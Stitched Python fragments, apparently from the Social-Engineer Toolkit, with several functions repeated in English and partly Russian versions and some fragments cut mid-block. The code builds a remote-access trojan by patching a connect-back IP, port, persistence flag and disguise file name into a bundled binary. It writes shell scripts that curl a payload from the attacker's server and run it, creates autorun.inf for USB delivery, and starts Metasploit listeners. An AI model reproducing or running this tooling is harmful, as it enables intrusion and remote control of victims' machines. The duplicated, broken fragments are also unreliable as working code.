def prepare_ratte(ipaddr, ratteport, persistent, customexe):
    """Write a configured copy of the bundled RATTE template to ``ratteM.exe``.

    The template is read from ``src/payloads/ratte/ratte.binary`` and written
    to ``<core.userconfigpath>/ratteM.exe``. Four placeholder runs in the
    template are replaced, first occurrence only, by the given value followed
    by a NUL byte:

    * ``X`` run -> ``ipaddr`` (connect-back host)
    * ``Y`` run -> ``ratteport``
    * ``Z`` run -> ``persistent``
    * ``Q`` run -> ``customexe`` (only looked for when non-empty)

    Each placeholder is one character longer than the value replacing it, so
    the replacement (value + NUL) has the same length as the run it replaces.
    The host and port therefore sit in the output file as plain
    NUL-terminated strings.
    """
    core.print_info("preparing RATTE...")
    # replace ipaddress with one that we need for reverse connection back
    ############
    # Load content of RATTE
    ############
    # NOTE(review): relative path, so this depends on the process's current
    # working directory at call time.
    with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
        data = fileopen.read()

    ############
    # PATCH Server IP into RATTE
    ############
    with open(os.path.join(core.userconfigpath, "ratteM.exe"),
              "wb") as filewrite:

        # Placeholder patterns: a single repeated letter, len(value) + 1 long.
        host = (len(ipaddr) + 1) * "X"
        r_port = (len(str(ratteport)) + 1) * "Y"
        pers = (len(str(persistent)) + 1) * "Z"
        # Check that customexe is non-empty; otherwise a field would be
        # patched (which would be wrong).
        if customexe:
            cexe = (len(str(customexe)) + 1) * "Q"
        else:
            cexe = ""

        # The replacements are chained in the order custom name, persistence,
        # host, port; each one touches at most one occurrence (count=1).
        filewrite.write(
            data.replace(cexe, customexe + "\x00",
                         1).replace(pers, persistent + "\x00", 1).replace(
                             host, ipaddr + "\x00",
                             1).replace(r_port,
                                        str(ratteport) + "\x00", 1))
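def update_config():
    """Regenerate ``config/set_config.py`` from the ``config/set_config`` text file.

    Every non-comment ``NAME=VALUE`` line of the text file becomes one Python
    assignment in the generated module; ``ON``/``OFF`` are mapped to
    ``True``/``False``, and ``value_type(NAME)`` decides whether the value is
    written as a string literal. The generated module is imported afterwards
    to compare its ``CONFIG_DATE`` with the timestamp written here.

    Security note: the generated file is Python source that this process
    imports, so whoever can edit ``set_config`` (or the config directory)
    controls code that runs with SET's privileges. Keep both writable by the
    operator account only.
    """
    timestamp = str(datetime.datetime.now())
    source_path = "%s/config/set_config" % (definepath)
    target_path = "%s/config/set_config.py" % (definepath)

    # open() replaces the Python-2-only file() builtin, and the with block
    # closes both handles even when a line fails half-way through.
    with open(source_path, "r") as init_file, \
            open(target_path, "w") as new_config:
        new_config.write(
            """#!/usr/bin/python\n
#######################################################################
##                    DO NOT MODIFY THIS FILE                        ##
#######################################################################
#  This file is generated by a routine inside SET, for use by SET.    #
#                                                                     # 
#  Settings should be modified in the set_config file, and then       #
#  SET updated using the 'Update SET Configuration' menu item in      #
#  the main menu. This file will be updated with the new settings.    #
#                                                                     #
#  set_config.py generated: """
            + timestamp
            + """                #
#                                                                     #
#######################################################################
CONFIG_DATE='"""
            + timestamp
            + """'\n"""
        )
        for line in init_file:
            if line.startswith("#"):
                continue
            # partition() keeps everything after the first "=", so a value
            # that itself contains "=" is no longer cut short.
            setting, separator, value = line.rstrip().partition("=")
            if not separator:
                # Blank line or line without "=": previously an IndexError
                # that aborted the whole update.
                continue

            if value == "ON":
                value = "True"
            elif value == "OFF":
                value = "False"

            if value_type(setting):
                # Escape backslashes and double quotes so the value stays
                # inside its string literal instead of breaking (or extending)
                # the generated module.
                literal = value.replace("\\", "\\\\").replace('"', '\\"')
                new_config.write(setting + '="' + literal + '"\n')
            else:
                # NOTE(review): the setting name and unquoted values are still
                # written verbatim as Python source; validate them against the
                # known settings if the config file can come from a less
                # trusted source than the operator.
                new_config.write(setting + "=" + value + "\n")

    sleep(1)
    # NOTE(review): if set_config was already imported in this process, this
    # import returns the cached module and `verify` holds the old timestamp.
    from set_config import CONFIG_DATE as verify

    print_info("New set_config.py file generated on: %s" % timestamp)
    print_info("Verifying configuration update...")
    if verify == timestamp:
        print_status("Update verified, config timestamp is: %s" % timestamp)
    else:
        print_error("Update failed? Timestamp on config file is: %s" % verify)
    print_status("SET is using the new config, no need to restart")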
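def update_config():
    """Regenerate ``/etc/setoolkit/set_config.py`` from ``/etc/setoolkit/set.config``.

    Every non-comment ``NAME=VALUE`` line of the text file becomes one Python
    assignment in the generated module; ``ON``/``OFF`` are mapped to
    ``True``/``False``, and ``value_type(NAME)`` decides whether the value is
    written as a string literal. ``/etc/setoolkit`` is then put on
    ``sys.path`` and the module imported to compare its ``CONFIG_DATE`` with
    the timestamp written here.

    Security note: the generated file is Python source that this process
    imports, so write access to ``/etc/setoolkit`` amounts to code execution
    with SET's privileges. Keep the directory and both files writable by the
    owning account only.
    """
    if not os.path.isdir("/etc/setoolkit"):
        os.makedirs("/etc/setoolkit")

    timestamp = str(datetime.datetime.now())

    # The with block closes both handles even when writing fails part-way.
    with open("/etc/setoolkit/set.config", "r") as init_file, \
            open("/etc/setoolkit/set_config.py", "w") as new_config:
        new_config.write("""#!/usr/bin/python\n
#######################################################################
##                    DO NOT MODIFY THIS FILE                        ##
#######################################################################
#  This file is generated by a routine inside SET, for use by SET.    #
#                                                                     #
#  Settings should be modified in the set.config file, and then       #
#  SET updated using the 'Update SET Configuration' menu item in      #
#  the main menu. This file will be updated with the new settings.    #
#                                                                     #
#  set.config.py generated: """ + timestamp + """                     #
#                                                                     #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n""")
        for line in init_file:
            if line.startswith("#"):
                continue
            # partition() keeps everything after the first "=", so a value
            # that itself contains "=" is no longer cut short.
            setting, separator, value = line.rstrip().partition("=")
            if not separator:
                # Blank line or line without "=": this is the case the old
                # bare `except: pass` was hiding.
                continue

            if value == "ON":
                value = "True"
            elif value == "OFF":
                value = "False"

            try:
                if value_type(setting):
                    # Escape backslashes and double quotes so the value stays
                    # inside its string literal instead of breaking (or
                    # extending) the generated module.
                    literal = value.replace("\\", "\\\\").replace('"', '\\"')
                    new_config.write(setting + '="' + literal + '"\n')
                else:
                    # NOTE(review): the setting name and unquoted values are
                    # still written verbatim as Python source; validate them
                    # against the known settings if the file can come from a
                    # less trusted source than the operator.
                    new_config.write(setting + '=' + value + '\n')
            except Exception:
                # Stay best-effort as before, but say which setting was
                # dropped. Only the name is printed: values may be secrets.
                print_error("Skipping config entry: %s" % setting)

    sleep(1)
    # Avoid growing sys.path by one entry per call.
    if "/etc/setoolkit" not in sys.path:
        sys.path.append("/etc/setoolkit")
    # NOTE(review): if set_config was already imported in this process, this
    # import returns the cached module and `verify` holds the old timestamp.
    from set_config import CONFIG_DATE as verify
    print_info("New set.config.py file generated on: %s" % timestamp)
    print_info("Verifying configuration update...")
    if verify == timestamp:
        print_status("Update verified, config timestamp is: %s" % timestamp)
    else:
        print_error("Update failed? Timestamp on config file is: %s" % verify)
    print_status("SET is using the new config, no need to restart")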
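def start_web_server_tw(directory,port):
        """Serve ``directory`` over HTTP on ``port`` from a background thread.

        The listener binds 0.0.0.0, i.e. every interface, and
        SimpleHTTPRequestHandler serves the whole tree under the current
        working directory without authentication. Anything placed in
        ``directory`` is readable by every host that can reach the port.

        The process-wide working directory is changed to ``directory`` and
        the server object is stored in the module-level ``httpd``.
        """
        global httpd
        try:
                # import the threading, socketserver, and simplehttpserver
                import thread,SocketServer,SimpleHTTPServer
                # allow_reuse_address lets a restart bind the port again while
                # an earlier socket is still lingering
                class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
                # bind first: a port that is already taken fails here, before
                # the working directory has been touched
                httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
                # The handler resolves request paths against the current
                # working directory, so switch to the output directory BEFORE
                # the first request can be answered; otherwise the previous
                # working directory is briefly exposed.
                try:
                        os.chdir(directory)
                except OSError:
                        # do not leave a bound listener behind that never serves
                        httpd.server_close()
                        raise
                # serve in a background thread
                thread.start_new_thread(httpd.serve_forever,())

        # only covers an interrupt delivered while this function is running
        except KeyboardInterrupt:
                core.print_info("Exiting the SET web server...")
                httpd.socket.close()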
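def start_web_server_tw(directory, port):
    """Serve ``directory`` over HTTP on ``port`` from a background thread.

    The listener binds 0.0.0.0, i.e. every interface, and
    SimpleHTTPRequestHandler serves the whole tree under the current working
    directory without authentication. Anything placed in ``directory`` is
    readable by every host that can reach the port.

    The process-wide working directory is changed to ``directory`` and the
    server object is stored in the module-level ``httpd``.
    """
    global httpd
    try:
        # allow_reuse_address lets a restart bind the port again while an
        # earlier socket is still lingering

        class ReusableTCPServer(SocketServer.TCPServer):
            allow_reuse_address = True

        # bind first: a port that is already taken fails here, before the
        # working directory has been touched
        httpd = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
        # The handler resolves request paths against the current working
        # directory, so switch to the output directory BEFORE the first
        # request can be answered; otherwise the previous working directory
        # is briefly exposed.
        try:
            os.chdir(directory)
        except OSError:
            # do not leave a bound listener behind that never serves
            httpd.server_close()
            raise
        # serve in a background thread
        thread.start_new_thread(httpd.serve_forever, ())

    # only covers an interrupt delivered while this function is running
    except KeyboardInterrupt:
        core.print_info("Выход из веб-сервера SET...")
        httpd.socket.close()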
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
    """Write a configured copy of the bundled RATTE template to ``ratteM.exe``.

    The template is read from ``src/payloads/ratte/ratte.binary``. Four
    placeholder runs in it are replaced, first occurrence only, by the given
    value followed by a NUL byte:

    * ``X`` run -> ``ipaddr`` (connect-back host)
    * ``Y`` run -> ``ratteport``
    * ``Z`` run -> ``persistent``
    * ``Q`` run -> ``customexe`` (only looked for when non-empty)

    Each placeholder is one character longer than the value replacing it, so
    the replacement (value + NUL) has the same length as the run it replaces.
    The host and port therefore sit in the output file as plain
    NUL-terminated strings.
    """
    core.print_info("preparing RATTE...")
    # replace ipaddress with one that we need for reverse connection back
    ############
    # Load content of RATTE
    ############
    # NOTE(review): relative path, so this depends on the process's current
    # working directory at call time.
    with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
        data = fileopen.read()

    ############
    # PATCH Server IP into RATTE
    ############
    # The output path is built by plain string concatenation; os.path.join()
    # with a single argument returns it unchanged, so core.setdir has to end
    # with a path separator for the file to land inside that directory.
    with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:

        # Placeholder patterns: a single repeated letter, len(value) + 1 long.
        host = (len(ipaddr) + 1) * "X"
        r_port = (len(str(ratteport)) + 1) * "Y"
        pers = (len(str(persistent)) + 1) * "Z"
        # Check that customexe is non-empty; otherwise a field would be
        # patched (which would be wrong).
        if customexe:
            cexe = (len(str(customexe)) + 1) * "Q"
        else:
            cexe = ""

        # The replacements are chained in the order custom name, persistence,
        # host, port; each one touches at most one occurrence (count=1).
        filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
                        print(core.bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")

    web_server_start()
    # if we are using ettercap
    if os.path.isfile(os.path.join(core.setdir, "ettercap")):
        with open(os.path.join(core.setdir, "ettercap")) as fileopen5:
            for line in fileopen5:
                ettercap = line.rstrip()
                # run in background
                ettercap += " &"
                # spawn ettercap or dsniff
                subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

    # if metasploit config is in directory
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        core.print_info("Launching MSF Listener...")
        core.print_info("This may take a few to load MSF...")
        # this checks to see if we want to start a listener
        automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower()
        if automatic_listener != "off":
            # specify if we are using the multi pyinjector
            meta_config = "meta_config"
            if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                meta_config = "meta_config_multipyinjector"
            # if we arent using a custom payload
            if custom != 1:
                child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config)))
            # check if we want to deliver emails or track users that click the
            # link
            webattack_email = core.check_config("WEBATTACK_EMAIL=").lower()
            if webattack_email == "on" or track_email == "on":
    # core upx
    pass #setcore.upx("src/program_junk/msf.exe")

# Stage the generated files in the web_clone directory.
# Replace any earlier msf.exe in web_clone with the current one, if one exists.
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
    os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
    shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")

# For the SETSHELL selection, the bundled shell.windows file is copied into
# web_clone under the fixed name "x", replacing a previous copy.
if payload_selection == "SETSHELL":
    if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)):
        os.remove("%s/src/program_junk/web_clone/x" % (definepath))
    shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath))

# if we are targetting nix
if posix == True:
    setcore.print_info("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
    # mac.bin and nix.bin are small shell scripts written as text; each one
    # fetches a randomly named file over plain HTTP with curl, marks it
    # executable and runs it in the background.
    filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w")
    # Fields 1 and 2 of the space-separated `webserver` string are used both
    # as the download host and as the two arguments passed to the fetched
    # binary; presumably host and port -- verify against where `webserver`
    # is assigned.
    payload_flags = webserver.split(" ")
    # grab osx binary name
    osx_name = setcore.generate_random_string(10,10)
    downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
    filewrite.write(downloader)
    filewrite.close()
    # grab nix binary name
    linux_name = setcore.generate_random_string(10,10)
    # NOTE(review): this script uses the interpreter line #!/usr/bin/sh while
    # the mac.bin script above uses #!/bin/sh.
    downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
    filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w")
    filewrite.write(downloader)
    filewrite.close()
    # The bundled POSIX binaries are copied into web_clone under the random
    # names the two scripts refer to.
    shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name))
    shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
def main():
    """Interactive entry point: collect the settings, build ratteM.exe, offer to start the listener.

    Prompts in turn for the connect-back IP address, the listener port, the
    persistence flag and an optional file name, passes them to
    prepare_ratte(), reports the output path and finally asks whether
    ratte_listener_start() should be run on the chosen port.
    """
    # valid_site is assigned but never read in this function.
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    # Up to three attempts; after the third invalid address the function
    # returns without building anything.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nМожет быть, вы неправильно написали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    # Any non-numeric answer, at the first prompt or at a re-prompt, raises
    # ValueError and selects the default port 8080.
    # NOTE(review): only 0 and values above 65535 are rejected; a negative
    # number passes this check.
    try:
        ratteport = int(
            input(
                core.setprompt(
                    ["9", "2"],
                    "Порт RATTE Server должен прослушивать [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Введите порт RATTE Сервер должен прослушивать [8080]")
                ))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #         persistent='NO'
    # else:
    #         persistent='YES'

    # Repeats until the answer is one of no/n/yes/y (case-insensitive) and
    # normalises it to the literal "NO" or "YES".
    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"],
                           "Должен ли RATTE быть постоянным [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    # Reset so the same flag can drive the listener prompt below.
    valid_response = False

    # The file name is passed on exactly as typed; an empty answer is allowed.
    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
                       ))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Полезная нагрузка была экспортирована в %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Запустите слушатель ratteserver сейчас [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Старт ратсервер...")
            ratte_listener_start(ratteport)
            core.print_info("Остановка ратсервера...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
    elif trigger == 3:
        payload = "openthis.wab"

    else:
        payload = ""

    filewrite.write(
        """[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))

core.print_status(
    "Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'"
)
core.print_status(
    "Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed."
)
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")

# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
    choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
    if choice1.lower() == "yes" or choice1.lower() == "y":
        # if we used something to create other than solo.py then write out the
        # listener
        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
                for line in fileopen:
                    line = line.split(" ")
                    filewrite.write("use multi/handler\n")
                    filewrite.write("set payload {0}\n".format(line[0]))
                    filewrite.write("set lhost {0}\n".format(line[1]))
def main():
    """Interactive entry point: collect the settings, build ratteM.exe, offer to start the listener.

    Prompts in turn for the connect-back IP address, the listener port, the
    persistence flag and an optional file name, passes them to
    prepare_ratte(), reports the output path and finally asks whether
    ratte_listener_start() should be run on the chosen port.
    """
    # valid_site is assigned but never read in this function.
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    # Up to three attempts; after the third invalid address the function
    # returns without building anything.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    # Any non-numeric answer, at the first prompt or at a re-prompt, raises
    # ValueError and selects the default port 8080.
    # NOTE(review): only 0 and values above 65535 are rejected; a negative
    # number passes this check.
    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #         persistent='NO'
    # else:
    #         persistent='YES'

    # Repeats until the answer is one of no/n/yes/y (case-insensitive) and
    # normalises it to the literal "NO" or "YES".
    while not valid_response:
        persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    # Reset so the same flag can drive the listener prompt below.
    valid_response = False

    # The file name is passed on exactly as typed; an empty answer is allowed.
    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    # The reported path is core.setdir and the file name concatenated;
    # os.path.join() with a single argument returns it unchanged.
    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
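    if prompt == "yes" or prompt == "y":
        # Ask for the CA-provided code signing certificate and keep asking
        # until the answer names an existing file.
        cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
        while not os.path.isfile(cert_path):
            core.print_error("ERROR:Filename not found. Try again.")
            cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))

        # here is where we import the certificate
        try:
            core.print_info("Importing the certificate into SET...")

            # Pass keytool an argument list instead of a shell string: the
            # path comes from a prompt, and with shell=True a file name
            # containing spaces or shell metacharacters (; | $ ` ...) would be
            # split or interpreted by the shell rather than handed to keytool
            # as a single -file argument.
            subprocess.Popen(["keytool", "-import", "-alias", "MyCert", "-file", cert_path]).wait()
            # trigger that we have our certificate already and bypass the
            # request process below
            use_flag = 1

        # Kept as broad as before so the menu flow is unchanged.
        # NOTE(review): a keytool failure such as an already existing alias
        # is reported through the exit status of wait(), not as an exception,
        # so use_flag is set even when the import did not succeed. An
        # exception here now mainly means keytool could not be started.
        except:
            pass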

    # this will exit the menu
    if prompt == "quit" or prompt == "q":
        use_flag = 0
        prompt = "yes"
        cert_path = ""
def main():
    """Interactive entry point: collect the settings, build ratteM.exe, offer to start the listener.

    Prompts in turn for the connect-back IP address, the listener port, the
    persistence flag and an optional file name, passes them to
    prepare_ratte(), reports the output path and finally asks whether
    ratte_listener_start() should be run on the chosen port.
    """
    # valid_site is assigned but never read in this function.
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    # Up to three attempts; after the third invalid address the function
    # returns without building anything.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    # Any non-numeric answer, at the first prompt or at a re-prompt, raises
    # ValueError and selects the default port 8080.
    # NOTE(review): only 0 and values above 65535 are rejected; a negative
    # number passes this check.
    try:
        ratteport = int(
            input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #         persistent='NO'
    # else:
    #         persistent='YES'

    # Repeats until the answer is one of no/n/yes/y (case-insensitive) and
    # normalises it to the literal "NO" or "YES".
    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    # Reset so the same flag can drive the listener prompt below.
    valid_response = False

    # The file name is passed on exactly as typed; an empty answer is allowed.
    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Payload has been exported to %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main():
    """Interactive entry point for the combined website-clone and RATTE workflow.

    Prompts for a website URL, the connect-back IP address, two ports, the
    persistence flag and an optional file name; then calls prepare_ratte(),
    java_applet_attack_tw(), copies ratteM.exe into the reports directory,
    runs ratte_listener_start() and finally stop_web_server_tw().
    """
    valid_site = False
    valid_ip = False
    # valid_persistence = False
    input_counter = 0
    site_input_counter = 0
    ipaddr = None
    website = None

    # pause=input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    # Accepted when the parsed URL has scheme http or https and a non-empty
    # netloc; the function returns after the third rejected answer.
    while not valid_site and site_input_counter < 3:
        website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
                site_input_counter += 1
                # core.DebugInfo("site.scheme is: %s " % site.scheme)
                # core.DebugInfo("site.netloc is: %s " % site.netloc)
                # core.DebugInfo("site.path is: %s " % site.path)
                # core.DebugInfo("site.params are: %s " % site.params)
                # core.DebugInfo("site.query is: %s " % site.query)
                # core.DebugInfo("site.fragment is: %s " % site.fragment)

    # Up to three attempts; the function returns after the third invalid address.
    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # javaport must be 80, cause applet uses in web injection port 80 to download payload!
    # A non-numeric answer raises ValueError and selects the default 80.
